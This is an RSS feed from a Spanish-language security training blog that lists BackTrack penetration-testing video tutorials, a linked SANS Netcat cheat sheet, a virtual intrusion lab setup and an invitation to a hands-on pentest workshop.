<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; BackTrack</title>
	<atom:link href="http://labs.dragonjar.org/tag/backtrack/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Video tutoriales de introducción a BackTrack</title>
		<link>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack</link>
		<comments>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack#comments</comments>
		<pubDate>Mon, 08 Mar 2010 04:52:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Enumeración]]></category>
		<category><![CDATA[Ethical Hacking]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=870</guid>
		<description><![CDATA[El año pasado tuve la oportunidad y el placer de asistir como ponente en varias conferencias nacionales sobre diferentes temáticas relacionadas con la seguridad de la información. Una de ellas fue el evento que cada año lidera incansablemente Diego A Salazar: Securinf; en este evento participé con dos conferencias: Análisis de Malware sobre windows y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El año pasado tuve la oportunidad y el placer de asistir como ponente en varias conferencias nacionales sobre diferentes temáticas relacionadas con la seguridad de la información.</p>
<p style="text-align: justify;">Una de ellas fue el evento que cada año lidera incansablemente Diego A Salazar: <a href="http://securinf.com/" target="_blank"><strong>Securinf</strong></a>; en este evento participé con dos conferencias: Análisis de Malware sobre windows y un WorkShop de BackTrack.</p>
<p style="text-align: justify;">El objetivo de este post es publicar los video tutoriales que presenté ese día. Aunque son muy cortos y básicos pueden servir para quienes recién inician en este campo de la seguridad mediante el uso de la distribución BackTrack. También debe tenerse en cuenta que estos los realicé exclusivamente para un workshop, por lo tanto no tienen audio, pues están pensados en ir mostrando la herramienta e ir explicando su funcionamiento y configuración en vivo. Haré una recopilación de lo publicado hasta el momento sobre los laboratorios de BackTrack y luego los enlaces de descarga con una pequeña descripción de los videos presentados en la conferencia.</p>
<h3><a rel="bookmark" href="../video-tutorial-backtrack-introduccion-y-conceptos-basicos">Video Tutorial BackTrack, Introducción y Conceptos Básicos</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios">Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-instalacion-de-backtrack-4-pre-final">Video Tutorial: Instalación de BackTrack 4 (Pre-Final)</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final">Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final">Video Tutorial: Instalación de VMWare WorkStation en BackTrack 4 (Pre-Final)</a></h3>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p style="text-align: justify;"><strong>Videos del WorkShop de Backtrack:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234959762/af2fea7b/Booteo_BackTrack.html" target="_blank">01- Booteo BackTrack (Creación y configuración de una máquina virtual en VirtualBox &#8211; Booteo inicial de BackTrack)</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234969634/7d59abec/Inicio_backtrack.html" target="_blank">02 &#8211; Ejecución inicial de BackTrack (Inicio del servicio de red, Inicio del servidor X, Cambio de contraseña, Rápido recorrido por el menú K)</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234981672/8ad25d53/BackTrack_Directorios_Servicio.html" target="_blank">03 &#8211; Recorrido por los directorios de herramientas contenidas en BackTrack -Web, Wireless, Passwords, Cisco, etc. Ejecución de servicios disponibles en BackTrack &#8211; HTTP, VNC, TFPT, etc.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234998735/317001f9/02-nmap.html" target="_blank">04 &#8211; Escaneo e identificación  de puertos y servicios con Nmap en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235037492/c4169002/BackTrack_AutoScan.html" target="_blank">05 &#8211; Escaneo automatizado de nuestra red con la herramienta AutoScan en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234992970/4055fd1c/BackTrack_Maltego.html" target="_blank">06 &#8211; Information Gathering/Footprinting con Maltego en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235092743/79978813/BackTrack_Reversing.html" target="_blank">07 &#8211; Introducción al análisis básico de ejecutables con OllyDbg en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235115468/b8ce2d9d/cifrados_web.html" target="_blank">08 &#8211; Identificación de cifrados utilizados en la web con BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235070644/f308016d/DirBuster.html" target="_blank">09 &#8211; Escaneo e identificación de directorios y archivos sensibles en servidores web con DirBuster en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235130659/aa7e39f4/identificacion_servidor_web.html" target="_blank">10 &#8211; Identificación del servidor Web con netcat y httprint.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235075306/487f979c/nikto_wikto.html" target="_blank">11 &#8211; Escaneo e identificación de directorios y archivos sensibles en servidores Web con Nikto (BackTrack) y Wikto (Windows).</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235104319/1bd39c/spidering_wget.html" target="_blank">12 &#8211; Spidering con Wget en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235086341/2292ff04/PenTest4.html" target="_blank">13 &#8211; Xhydra y John The Ripper en BackTrack.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Instalación de VMWare WorkStation en BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final#comments</comments>
		<pubDate>Sun, 23 Aug 2009 00:37:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=835</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)&#8220;. Quinto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como llevar a cabo la instalación básica de VMWare WorkStation en BackTrack. Resumen: Descarga de aplicativo VMWare WorkStation (www.vmware.com/downloads). Ejecución de del archivo de instalación [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="../video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final">Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</a>&#8220;.</p>
<p style="text-align: justify;">Quinto video tutorial dedicado al uso y configuración de la distribución <a href="http://labs.dragonjar.org/tag/backtrack" target="_blank">GNU/Linux BackTrack</a>.</p>
<p style="text-align: justify;">En este Video tutorial veremos como llevar a cabo la instalación básica de <a href="http://labs.dragonjar.org/tag/vmware" target="_blank">VMWare WorkStation</a> en <a href="http://labs.dragonjar.org/tag/backtrack" target="_blank">BackTrack</a>.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Descarga de aplicativo <a href="http://labs.dragonjar.org/tag/vmware" target="_blank">VMWare WorkStation</a> (<a href="www.vmware.com/downloads" target="_blank">www.vmware.com/downloads</a>).</li>
<li>Ejecución de del archivo de instalación (sudo sh vmware_versión.bundle).</li>
<li>Ejecución de VMWare WorkStation y el proceso de VMWare Kernel Module Updater.</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="672" height="542" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYGakm0A" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="672" height="542" src="http://blip.tv/play/AYGakm0A" allowfullscreen="true"></embed></object></p>
<p><strong><a href="http://www.4shared.com/file/126669258/b652773a/Inst_VMWare_BT_LabsDragonJARorg.html" target="_blank">Descargar video tutorial: Instalación de VMWare WorkStation en BackTrack</a> </strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final#comments</comments>
		<pubDate>Fri, 21 Aug 2009 12:23:27 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=827</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial: Instalación de BackTrack 4 (Pre-Final)&#8221;. Cuarto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este video tutorial veremos diferentes métodos de configuración básica.para el acceso a internet/intranet. Resumen: Ejecución de la instrucción start-network. Instalación y ejecución de dhcpcd (dhcpcd nombre_interfaz#). Configuración manual: ifconfig interfaz IP route [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final" target="_blank">Video Tutorial: Instalación de BackTrack 4 (Pre-Final</a>)&#8221;.</p>
<p style="text-align: justify;">Cuarto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este video tutorial veremos diferentes métodos de configuración básica.para el acceso a internet/intranet.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Ejecución de la instrucción start-network.</li>
<li>Instalación y ejecución de dhcpcd (dhcpcd nombre_interfaz#).</li>
<li>Configuración manual:
<ul>
<li>ifconfig interfaz IP</li>
<li>route add default gw IP_gw</li>
<li>echo nameserver IP_gw &gt; /etc/resolv.conf</li>
</ul>
</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="672" height="542" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYGZ3wcA" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="672" height="542" src="http://blip.tv/play/AYGZ3wcA" allowfullscreen="true"></embed></object></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/126662782/32e3a583/Config_Network_BT_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial: </strong></a><strong><a href="http://www.4shared.com/file/126662782/32e3a583/Config_Network_BT_LabsDragonJARorg.html" target="_blank">Configuración Básica de Red en BackTrack 4 (Pre-Final)</a> </strong>(<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Instalación de BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final#comments</comments>
		<pubDate>Fri, 24 Jul 2009 02:26:53 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=813</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios&#8220;. Tercer video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como llevar a cabo la instalación de BackTrack 4 Pre-Final en un sistema en limpio (Disco duro completo). Resumen: Booteo de BackTrack. Ejecución de ubiquity. Particionamiento. Descargar [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios" target="_blank">Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</a>&#8220;.</p>
<p style="text-align: justify;">Tercer video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este Video tutorial veremos como llevar a cabo la instalación de BackTrack 4 Pre-Final en un sistema en limpio (Disco duro completo).</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Booteo de BackTrack.</li>
<li>Ejecución de ubiquity.</li>
<li>Particionamiento.</li>
</ul>
<p style="text-align: center;"><embed src="http://blip.tv/play/AYGTsh8A" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/120199283/68ab42ac/BT4_iii_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial: Instalación de BackTrack 4 (Pre-Final)</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</title>
		<link>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios</link>
		<comments>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios#comments</comments>
		<pubDate>Thu, 23 Jul 2009 20:35:21 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=809</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial BackTrack, Introducción y Conceptos Básicos&#8220;. Segundo video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como iniciar con BackTrack en modo LiveDVD, conoceremos su interfaz gráfica y un primer acercamiento a las categorías de herramientas que esta incluye. Resumen: Descarga de BackTrack y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos" target="_blank">Video Tutorial BackTrack, Introducción y Conceptos Básicos</a>&#8220;.</p>
<p style="text-align: justify;">Segundo video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este Video tutorial veremos como iniciar con BackTrack en modo LiveDVD, conoceremos su interfaz gráfica y un primer acercamiento a las categorías de herramientas que esta incluye.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul>
<li>Descarga de BackTrack y grabación de la imagen.</li>
<li>Booteo de BackTrack.</li>
<li>Interfaz Gráfica de BackTrack.</li>
<li>Directorios de BackTrack.</li>
</ul>
<p style="text-align: center;"><embed src="http://blip.tv/play/AYGTqloA" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/120148909/cde6d8f/BT_ii_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial BackTrack: booteo, interfaz gráfica y directorios</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Video Tutorial BackTrack, Introducción y Conceptos Básicos</title>
		<link>http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos</link>
		<comments>http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos#comments</comments>
		<pubDate>Tue, 07 Jul 2009 20:37:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Video Tutorial]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=805</guid>
		<description><![CDATA[Comienza una nueva serie de video tutoriales dedicados al uso y configuración de la distribución GNU/Linux enfocada a la Seguridad de la Información (Penetration Testing) BackTrack. La idea será llevar a cabo y en modo de video tutoriales el contenido que había anunciado en este post (Contenido y Recursos). En este primer video tutorial haremos [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Comienza una nueva serie de video tutoriales dedicados al uso y configuración de la distribución GNU/Linux enfocada a la Seguridad de la Información (Penetration Testing) BackTrack.</p>
<p style="text-align: justify;">La idea será llevar a cabo y en modo de video tutoriales el contenido que había anunciado en este post (<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos" target="_blank"><strong>Contenido y Recursos</strong></a>).</p>
<p style="text-align: justify;">En este primer video tutorial haremos un completa introducción a BackTrack y los conceptos básicos que ella abarca.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul>
<li>Introducción a BackTrack (Distribución GNU/Linux &#8211; LiveCD/DVD/VMWare)</li>
<li>Definiciones /Conceptos Básicos (Repositorios de herramientas)</li>
<li>Categorías / Herramientas / Fases (Enumeration, Web Applications, Fuzzers, etc / Meta Packages)</li>
<li>Enlaces de descarga / Más información</li>
</ul>
<p><embed src="http://blip.tv/play/AYGPwEkA" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p><a href="http://www.4shared.com/file/116586023/820d3761/BT_i_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial de BackTrack, Introducción y Conceptos Básicos</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos/feed</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Cheat Sheet: Netcat</title>
		<link>http://labs.dragonjar.org/cheat-sheet-netcat</link>
		<comments>http://labs.dragonjar.org/cheat-sheet-netcat#comments</comments>
		<pubDate>Tue, 05 May 2009 20:19:25 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Cheat Sheet]]></category>
		<category><![CDATA[Comandos Linux]]></category>
		<category><![CDATA[Netcat]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=741</guid>
		<description><![CDATA[Un Cheat Sheet puede ser definido como un conjunto o agrupación de notas (comandos, instrucciones, parámetros, etc.) que sirven o se aplican como referencia inmediata para una determinada herramienta (software), lenguaje de programación, materia o procedimiento (técnica). El siguiente Cheat Sheet proporciona diversas instrucciones de ejemplo sobre el uso de la herramienta Netcat sobre diferentes [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Un Cheat Sheet puede ser definido como un conjunto o agrupación de notas (comandos, instrucciones, parámetros, etc.) que sirven o se aplican como referencia inmediata para una determinada herramienta (software), lenguaje de programación, materia o procedimiento (técnica).</p>
<p style="text-align: justify;">El siguiente Cheat Sheet proporciona diversas instrucciones de ejemplo sobre el uso de la herramienta Netcat sobre diferentes Sistemas Operativos.</p>
<p style="text-align: justify;"><strong>Contenido:</strong></p>
<ul>
<li>Fundamental Netcat Cliente</li>
<li>Netcat Command Flags</li>
<li>Netcat Relays on Windows</li>
<li>File Transfer</li>
<li>TCP Port Scanner</li>
<li>TCP Banner Graber</li>
<li>Backdoor Shells</li>
<li>Netcat Relays on Linux</li>
</ul>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/103587601/7c960021/Netcat_Cheat_Sheet_DragonJARorg.html" target="_blank"><strong>Descargar Cheat Sheet de Netcat</strong></a> PDF (<strong>Password:</strong> www.dragonjar.org)</p>
<p style="text-align: justify;">Este Cheat Sheet fué desarrollado y publicado por la <a href="http://www.sans.org/" target="_blank"><strong>SANS</strong></a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/cheat-sheet-netcat/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Video tutorial de configuración del entorno virtualizado de intrusión &#8220;Sauron&#8221; en Linux</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-configuracion-del-entorno-virtualizado-de-intrusion-sauron-en-linux</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-configuracion-del-entorno-virtualizado-de-intrusion-sauron-en-linux#comments</comments>
		<pubDate>Sat, 21 Mar 2009 19:32:41 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[HackLabs]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sauron]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=683</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El siguiente video tutorial muestra el proceso necesario para llevar a cabo la instalación y configuración del Entorno Virtualizado de Intrusión conocido como Sauron en un Sistema Linux (Backtrack 4 con entorno gráfico Gnome).</p>
<p style="text-align: center;"><center>															<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/brUr50H3hv8&#038;hl=es&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/brUr50H3hv8&#038;hl=es&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object>										</center></p>
<p style="text-align: justify;">De este entorno ya se ha hablado mucho en la web, por ello prefieron dejar los enlaces a más información al respecto, incluso los enlaces a los videso que publiqué sobre el desarrollo del mismo.</p>
<h3><a title="Enlace permanente a SecGame #1: Sauron" rel="bookmark" href="http://www.dragonjar.org/secgame-1-sauron.xhtml"> SecGame #1: Sauron</a></h3>
<h3><a title="Solución y seguimiento del HackTaller 01 DragonJAR (I de VIII)" href="../solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii">Solución y seguimiento del HackTaller 01 DragonJAR (I de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (II de VIII)" href="../solucion-del-hacktaller-01-dragonjar-ii-de-viii">Solución del HackTaller 01 DragonJAR (II de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (III de VIII)" href="../solucion-del-hacktaller-01-dragonjar-iii-de-viii">Solución del HackTaller 01 DragonJAR (III de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (V de VIII)" href="../solucion-del-hacktaller-01-dragonjar-v-de-viii">Solución del HackTaller 01 DragonJAR (V de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (VI de VIII)" href="../solucion-del-hacktaller-01-dragonjar-vi-de-viii">Solución del HackTaller 01 DragonJAR (VI de VIII)</a></h3>
<h3><a title="“Rooteo” a Sauron, solución alternativa" href="../rooteo-a-sauron-solucion-alternativa">“Rooteo” a Sauron, solución alternativa</a></h3>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-configuracion-del-entorno-virtualizado-de-intrusion-sauron-en-linux/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HackTaller 08 Medellín &#8211; PenTest (Repetición)</title>
		<link>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion</link>
		<comments>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion#comments</comments>
		<pubDate>Thu, 19 Feb 2009 07:48:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=620</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo nuevamente la invitación a todos los interesados en participar de este 8° HackTaller a realizarse en la ciudad de Medellín.</p>
<p style="text-align: justify;">La idea es que a este Hack Lab puedan asistir las personas que se quedaron sin cupo en el anterior o que por uno u otro motivo no pudieron asistir.</p>
<p style="text-align: justify;">La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.</p>
<p style="text-align: justify;">El escenario propuesto para este Test de Penetración es el siguiente:</p>
<p style="text-align: justify;">Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (<a href="http://174.36.1.2/bt3.7z">Descargar imágen de máquina virtual BackTrack 3</a>)<br />
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong> &#8211; Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!</strong><br />
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)<br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
